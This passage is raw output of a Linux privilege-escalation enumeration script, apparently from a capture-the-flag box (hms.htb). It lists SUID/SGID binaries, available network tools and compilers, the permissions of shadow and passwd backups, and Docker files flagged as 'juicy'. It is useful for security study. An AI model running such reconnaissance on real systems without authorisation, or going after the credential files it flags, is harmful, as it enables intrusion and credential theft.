-rw-r--r-- 1 root root  693 Apr 12  2018 lvm2-monitor.service
-rw-r--r-- 1 root root  403 Apr 12  2018 lvm2-pvscan@.service
lrwxrwxrwx 1 root root    9 Apr 12  2018 lvm2.service -> /dev/null
-rw-r--r-- 1 root root  175 Mar 27  2018 polkit.service
-rw-r--r-- 1 root root  544 Mar 22  2018 apparmor.service
-rw-r--r-- 1 root root  169 Feb 20  2018 atd.service
-rw-r--r-- 1 root root  287 Feb 15  2018 keyboard-setup.service
-rw-r--r-- 1 root root  312 Feb 15  2018 console-setup.service
-rw-r--r-- 1 root root  919 Jan 28  2018 basic.target
-rw-r--r-- 1 root root  419 Jan 28  2018 bluetooth.target
-rw-r--r-- 1 root root  465 Jan 28  2018 cryptsetup-pre.target
-rw-r--r-- 1 root root  412 Jan 28  2018 cryptsetup.target
-rw-r--r-- 1 root root  750 Jan 28  2018 dev-hugepages.mount
-rw-r--r-- 1 root root  665 Jan 28  2018 dev-mqueue.mount
-rw-r--r-- 1 root root  471 Jan 28  2018 emergency.target
-rw-r--r-- 1 root root  541 Jan 28  2018 exit.target
-rw-r--r-- 1 root root  480 Jan 28  2018 final.target
-rw-r--r-- 1 root root  506 Jan 28  2018 getty-pre.target
-rw-r--r-- 1 root root  500 Jan 28  2018 getty.target
-rw-r--r-- 1 root root  598 Jan 28  2018 graphical.target
-rw-r--r-- 1 root root  527 Jan 28  2018 halt.target
-rw-r--r-- 1 root root  509 Jan 28  2018 hibernate.target
-rw-r--r-- 1 root root  530 Jan 28  2018 hybrid-sleep.target
-rw-r--r-- 1 root root  593 Jan 28  2018 initrd-fs.target
-rw-r--r-- 1 root root  561 Jan 28  2018 initrd-root-device.target
-rw-r--r-- 1 root root  566 Jan 28  2018 initrd-root-fs.target
-rw-r--r-- 1 root root  754 Jan 28  2018 initrd-switch-root.target
-rw-r--r-- 1 root root  763 Jan 28  2018 initrd.target
-rw-r--r-- 1 root root  541 Jan 28  2018 kexec.target
-rw-r--r-- 1 root root  435 Jan 28  2018 local-fs-pre.target
-rw-r--r-- 1 root root  547 Jan 28  2018 local-fs.target
-rw-r--r-- 1 root root  445 Jan 28  2018 machine.slice
-rw-r--r-- 1 root root  532 Jan 28  201[-] Installed Apache modules:
Loaded Modules:
 core_module (static)
 so_module (static)
 watchdog_module (static)
 http_module (static)
 log_config_module (static)
 logio_module (static)
 version_module (static)
 unixd_module (static)
 access_compat_module (shared)
 alias_module (shared)
 auth_basic_module (shared)
 authn_core_module (shared)
 authn_file_module (shared)
 authz_core_module (shared)
 authz_host_module (shared)
 authz_user_module (shared)
 autoindex_module (shared)
 deflate_module (shared)
 dir_module (shared)
 env_module (shared)
 filter_module (shared)
 mime_module (shared)
 mpm_prefork_module (shared)
 negotiation_module (shared)
 php7_module (shared)
 reqtimeout_module (shared)
 setenvif_module (shared)
 status_module (shared)


### INTERESTING FILES ####################################
[-] Useful file locations:
/bin/nc
/bin/netcat
/usr/bin/wget
/usr/bin/gcc
/usr/bin/curl


[-] Installed compilers:
ii  gcc                                    4:7.4.0-1ubuntu2.3                              amd64        GNU C compiler
ii  gcc-7                                  7.5.0-3ubuntu1~18.04                            amd64        GNU C compiler


[-] Can we read/write sensitive files:
-rw-r--r-- 1 root root 1708 Nov 19  2019 /etc/passwd
-rw-r--r-- 1 root root 738 May  6 08:39 /etc/group
-rw-r--r-- 1 root root 581 Apr  9  2018 /etc/profile
-rw-r----- 1 root shadow 1204 Nov 19  2019 /etc/shadow


[-] SUID files:
-rwsr-xr-x 1 root root 44664 Jan 25  2018 /bin/su
-rwsr-xr-x 1 root root 30800 Aug 11  2016 /bin/fusermount
-rwsr-xr-x 1 root root 43088 Oct 15  2018 /bin/mount
-rwsr-xr-x 1 root root 64424 Mar  9  2017 /bin/ping
-rwsr-xr-x 1 root root 26696 Oct 15  2018 /bin/umount
-rwsr-xr-x 1 root root 40152 Jan 27  2020 /snap/core/9436/bin/mount
-rwsr-xr-x 1 root root 44168 May  7  2014 /snap/core/9436/bin/ping
-rwsr-xr-x 1 root root 44680 May  7  2014 /snap/core/9436/bin/ping6
-rwsr-xr-x 1 root root 40128 Mar 25  2019 /snap/core/9436/bin/su
-rwsr-xr-x 1 root root 27608 Jan 27  2020 /snap/core/9436/bin/umount
-rwsr-xr-x 1 root root 71824 Mar 25  2019 /snap/core/9436/usr/bin/chfn
-rwsr-xr-x 1 root root 40432 Mar 25  2019 /snap/core/9436/usr/bin/chsh
-rwsr-xr-x 1 root root 75304 Mar 25  2019 /snap/core/9436/usr/bin/gpasswd
-rwsr-xr-x 1 root root 39904 Mar 25  2019 /snap/core/9436/usr/bin/newgrp
-rwsr-xr-x 1 root root 54256 Mar 25  2019 /snap/core/9436/usr/bin/passwd
-rwsr-xr-x 1 root root 136808 Jan 31  2020 /snap/core/9436/usr/bin/sudo
-rwsr-xr-- 1 root systemd-resolve 42992 Nov 29  2019 /snap/core/9436/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 428240 Mar  4  2019 /snap/core/9436/usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 110792 Jun  5 16:27 /snap/core/9436/usr/lib/snapd/snap-confine
-rwsr-xr-- 1 root dip 394984 Feb 11 15:40 /snap/core/9436/usr/sbin/pppd
-rwsr-xr-x 1 root root 40152 Jan 27  2020 /snap/core/9066/bin/mount
-rwsr-xr-x 1 root root 44168 May  7  2014 /snap/core/9066/bin/ping
-rwsr-xr-x 1 root root 44680 May  7  2014 /snap/core/9066/bin/ping6
-rwsr-xr-x 1 root root 40128 Mar 25  2019 /snap/core/9066/bin/su
-rwsr-xr-x 1 root root 27608 Jan 27  2020 /snap/core/9066/bin/umount
-rwsr-xr-x 1 root root 71824 Mar 25  2019 /snap/core/9066/usr/bin/chfn
-rwsr-xr-x 1 root root 40432 Mar 25  2019 /snap/core/9066/usr/bin/chsh
-rwsr-xr-x 1 root root 75304 Mar 25  2019 /snap/core/9066/usr/bin/gpasswd
-rwsr-xr-x 1 root root 39904 Mar 25  2019 /snap/core/9066/usr/bin/newgrp
-rwsr-xr-x 1 root root 54256 Mar 25  2019 /snap/core/9066/usr/bin/passwd
-rwsr-xr-x 1 root root 136808 Jan 31  2020 /snap/core/9066/usr/bin/sudo
-rwsr-xr-- 1 root systemd-resolve 42992 Nov 29  2019 /snap/core/9066/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 428240 Mar  4  2019 /snap/core/9066/usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 110792 Apr 10 16:44 /snap/core/9066/usr/lib/snapd/snap-confine
-rwsr-xr-- 1 root dip 394984 Feb 11 15:40 /snap/core/9066/usr/sbin/pppd
-rwsr-xr-x 1 root root 37136 Jan 25  2018 /usr/bin/newgidmap
-rwsr-xr-x 1 root root 37136 Jan 25  2018 /usr/bin/newuidmap
-rwsr-xr-x 1 root root 59640 Jan 25  2018 /usr/bin/passwd
-rwsr-xr-x 1 root root 18448 Mar  9  2017 /usr/bin/traceroute6.iputils
-rwsr-xr-x 1 root root 40344 Jan 25  2018 /usr/bin/newgrp
-rwsr-xr-x 1 root root 75824 Jan 25  2018 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 76496 Jan 25  2018 /usr/bin/chfn
-rwsr-xr-x 1 root root 22520 Mar 27  2019 /usr/bin/pkexec
-rwsr-xr-x 1 root root 44528 Jan 25  2018 /usr/bin/chsh
-rwsr-sr-x 1 daemon daemon 51464 Feb 20  2018 /usr/bin/at
-rwsr-xr-x 1 root root 149080 Jan 31  2020 /usr/bin/sudo
-rwsr-xr-x 1 root root 100760 Nov 23  2018 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
-rwsr-sr-x 1 root root 101240 Mar 15  2019 /usr/lib/snapd/snap-confine
-rwsr-xr-- 1 root messagebus 42992 Jun 11 18:25 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 14328 Mar 27  2019 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 10232 Mar 28  2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 436552 Mar  4  2019 /usr/lib/openssh/ssh-keysign


[-] SGID files:
-rwxr-sr-x 1 root shadow 35632 Apr  9  2018 /snap/core/9436/sbin/pam_extrausers_chkpwd
-rwxr-sr-x 1 root shadow 35600 Apr  9  2018 /snap/core/9436/sbin/unix_chkpwd
-rwxr-sr-x 1 root shadow 62336 Mar 25  2019 /snap/core/9436/usr/bin/chage
-rwxr-sr-x 1 root systemd-network 36080 Apr  5  2016 /snap/core/9436/usr/bin/crontab
-rwxr-sr-x 1 root mail 14856 Dec  7  2013 /snap/core/9436/usr/bin/dotlockfile
-rwxr-sr-x 1 root shadow 22768 Mar 25  2019 /snap/core/9436/usr/bin/expiry
-rwxr-sr-x 3 root mail 14592 Dec  3  2012 /snap/core/9436/usr/bin/mail-lock
-rwxr-sr-x 3 root mail 14592 Dec  3  2012 /snap/core/9436/usr/bin/mail-touchlock
-rwxr-sr-x 3 root mail 14592 Dec  3  2012 /snap/core/9436/usr/bin/mail-unlock
-rwxr-sr-x 1 root crontab 358624 Mar  4  2019 /snap/core/9436/usr/bin/ssh-agent
-rwxr-sr-x 1 root tty 27368 Jan 27  2020 /snap/core/9436/usr/bin/wall
-rwxr-sr-x 1 root shadow 35632 Apr  9  2018 /snap/core/9066/sbin/pam_extrausers_chkpwd
-rwxr-sr-x 1 root shadow 35600 Apr  9  2018 /snap/core/9066/sbin/unix_chkpwd
-rwxr-sr-x 1 root shadow 62336 Mar 25  2019 /snap/core/9066/usr/bin/chage
-rwxr-sr-x 1 root systemd-network 36080 Apr  5  2016 /snap/core/9066/usr/bin/crontab
-rwxr-sr-x 1 root mail 14856 Dec  7  2013 /snap/core/9066/usr/bin/dotlockfile
-rwxr-sr-x 1 root shadow 22768 Mar 25  2019 /snap/core/9066/usr/bin/expiry
-rwxr-sr-x 3 root mail 14592 Dec  3  2012 /snap/core/9066/usr/bin/mail-lock
-rwxr-sr-x 3 root mail 14592 Dec  3  2012 /snap/core/9066/usr/bin/mail-touchlock
-rwxr-sr-x 3 root mail 14592 Dec  3  2012 /snap/core/9066/usr/bin/mail-unlock
-rwxr-sr-x 1 root crontab 358624 Mar  4  2019 /snap/core/9066/usr/bin/ssh-agent
-rwxr-sr-x 1 root tty 27368 Jan 27  2020 /snap/core/9066/usr/bin/wall
-rwxr-sr-x 1 root tty 14328 Jan 17  2018 /usr/bin/bsd-write
-rwxr-sr-x 1 root crontab 39352 Nov 16  2017 /usr/bin/crontab
-rwxr-sr-x 1 root tty 30800 Oct 15  2018 /usr/bin/wall
-rwxr-sr-x 1 root mlocate 43088 Mar  1  2018 /usr/bin/mlocate
-rwxr-sr-x 1 root ssh 362640 Mar  4  2019 /usr/bin/ssh-agent
-rwxr-sr-x 1 root shadow 22808 Jan 25  2018 /usr/bin/expiry
-rwxr-sr-x 1 root shadow 71816 Jan 25  2018 /usr/bin/chage
-rwsr-sr-x 1 daemon daemon 51464 Feb 20  2018 /usr/bin/at
-rwxr-sr-x 1 root utmp 10232 Mar 11  2016 /usr/lib/x86_64-linux-gnu/utempter/utempter
-rwsr-sr-x 1 root root 101240 Mar 15  2019 /usr/lib/snapd/snap-confine
-rwxr-sr-x 1 root shadow 34816 Apr  5  2018 /sbin/unix_chkpwd
-rwxr-sr-x 1 root shadow 34816 Apr  5  2018 /sbin/pam_extrausers_chkpwd


[+] Files with POSIX capabilities set:
/usr/bin/mtr-packet = cap_net_raw+ep


[-] Can't search *.conf files as no keyword was entered

[-] Can't search *.php files as no keyword was entered

[-] Can't search *.log files as no keyword was entered

[-] Can't search *.ini files as no keyword was entered

[-] All *.conf files in /etc (recursive 1 level):
-rw-r--r-- 1 root root 92 Apr  9  2018 /etc/host.conf
-rw-r--r-- 1 root root 3028 Feb 14  2019 /etc/adduser.conf
-rw-r--r-- 1 root root 2683 Jan 17  2018 /etc/sysctl.conf
-rw-r--r-- 1 root root 2584 Feb  1  2018 /etc/gai.conf
-rw-r--r-- 1 root root 5986 Jul  9 09:23 /etc/ca-certificates.conf
-rw-r--r-- 1 root root 1477 May  6 09:03 /etc/memcached.conf
-rw-r--r-- 1 root root 280 Jun 20  2014 /etc/fuse.conf
-rw-r--r-- 1 root root 2969 Feb 28  2018 /etc/debconf.conf
-rw-r--r-- 1 root root 191 Feb  7  2018 /etc/libaudit.conf
-rw-r--r-- 1 root root 703 Aug 21  2017 /etc/logrotate.conf
-rw-r--r-- 1 root root 350 Feb 14  2019 /etc/popularity-contest.conf
-rw-r--r-- 1 root root 403 Mar  1  2018 /etc/updatedb.conf
-rw-r--r-- 1 root root 812 Mar 24  2018 /etc/mke2fs.conf
-rw-r--r-- 1 root root 34 Jan 27  2016 /etc/ld.so.conf
-rw-r--r-- 1 root root 6920 Sep 20  2018 /etc/overlayroot.conf
-rw-r--r-- 1 root root 604 Aug 13  2017 /etc/deluser.conf
-rw-r--r-- 1 root root 14867 Oct 13  2016 /etc/ltrace.conf
-rw-r--r-- 1 root root 1260 Feb 26  2018 /etc/ucf.conf
-rw-r--r-- 1 root root 1358 Jan 30  2018 /etc/rsyslog.conf
-rw-r--r-- 1 root root 4861 Feb 22  2018 /etc/hdparm.conf
-rw-r--r-- 1 root root 513 Feb 14  2019 /etc/nsswitch.conf
-rw-r--r-- 1 root root 552 Apr  4  2018 /etc/pam.conf
-rw-r--r-- 1 root root 100 Jun 25  2018 /etc/sos.conf


[-] Current user's history files:
lrwxrwxrwx 1 root root 9 May  5 11:22 /home/ash/.bash_history -> /dev/null
lrwxrwxrwx 1 root root 9 May  5 11:22 /home/ash/.mysql_history -> /dev/null


[-] Location and contents (if accessible) of .bash_history file(s):
/home/ash/.bash_history


[-] Location and Permissions (if accessible) of .bak file(s):
-rw------- 1 root shadow 610 May  6 08:39 /var/backups/gshadow.bak
-rw------- 1 root root 738 May  6 08:39 /var/backups/group.bak
-rw------- 1 root shadow 1204 Nov 19  2019 /var/backups/shadow.bak
-rw------- 1 root root 1708 Nov 19  2019 /var/backups/passwd.bak
-rw-r--r-- 1 root root 533 Nov 17  2019 /etc/netplan/50-cloud-init.yaml.bak


[-] Any interesting mail in /var/mail:
total 8
drwxrwsr-x  2 root mail 4096 Feb 14  2019 .
drwxr-xr-x 14 root root 4096 Sep 17  2019 ..


[+] Looks like we're hosting Docker:
Docker version 18.09.1, build 4c52b90


[-] Anything juicy in the Dockerfile:
-rwxrwxr-x 1 www-data www-data 1970 May 28  2018 /var/www/hms.htb/public_html/contrib/util/docker/Dockerfile


[-] Anything juicy in docker-compose.yml:
-rwxrwxr-x 1 www-data www-data 3995 May 28  2018 /var/www/hms.htb/public_html/docker-compose.yml


### SCAN COMPLETE ####################################